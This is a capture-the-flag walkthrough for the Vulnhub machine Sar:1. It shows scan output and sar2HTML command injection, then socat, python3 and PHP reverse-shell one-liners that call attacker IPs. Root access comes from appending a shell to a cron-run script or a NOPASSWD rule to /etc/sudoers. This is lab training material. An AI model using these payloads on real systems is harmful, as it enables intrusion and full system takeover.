Sar1
Sar:1 Vulnhub Walkthrough
Enumeration
Nmap
nmap -sC -sV -oA nmap/sar1 192.168.43.166Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 22:37 EDT
Nmap scan report for 192.168.1.112
Host is up (0.0033s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:46:0D:BC (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
1 port open only ! Great!
Dirb
dirb http://192.168.43.166-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 13 22:38:52 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.112/ ----
+ http://192.168.1.112/index.html (CODE:200|SIZE:10918)
+ http://192.168.1.112/phpinfo.php (CODE:200|SIZE:95475)
+ http://192.168.1.112/robots.txt (CODE:200|SIZE:9)
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Wed May 13 22:38:57 2020
DOWNLOADED: 4612 - FOUND: 4
Reverse Shell
Let's navigate to robots.txt
replace robots.txt to sar2HTML at the URL.
After Googling for awhile, I found sar2HTML exploit at exploit-db.
This means that we can put semicolon after plot then we can write command at the back of it to access the machine, so guess this is here where we can supply a reverse shell code and get access to the machine.
nc -nv <IP> <Port> doesn't work so I use socat to get a reverse shell from it, we also can use python3 to get a reverse shell from it
Socat
Victim's Machine - socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Attacking Machine - socat file:`tty`,raw,echo=0 tcp-listen:4444
Python3
Victim Machine - python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Attacking Machine - nc -nlvp <port>
We got a shell!
Navigate to the love user directory then we will get the flag for user
Privilege Escalation
After trying some method and I found something at crontab
It seems like there is a file called finally.sh that will run as superuserdo every 5 minutes
Lets locate the file
After that we cat finally.sh
We can see that inside of the finally.sh will run another file which called write.sh that also have it inside this folder.
We can see that finally.sh is not writable but normal user, but write.sh can
We can add some code inside
Method 1
echo "php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh Then, go to the attacking machine and set up a listener by typing
nc -lvp 4444
Wait for 5 minutes and you will get a shell and it is root !
Method 2
echo "www-data NOPASSWD: /bin/bash" >> /etc/sudoersWait for 5 minutes then type
sudo -l and you will see can execute /bin/bash without password we created earlier
sudo /bin/bash to get root !
Navigate to /root to get the flag!
Congratulation!
Last updated
Was this helpful?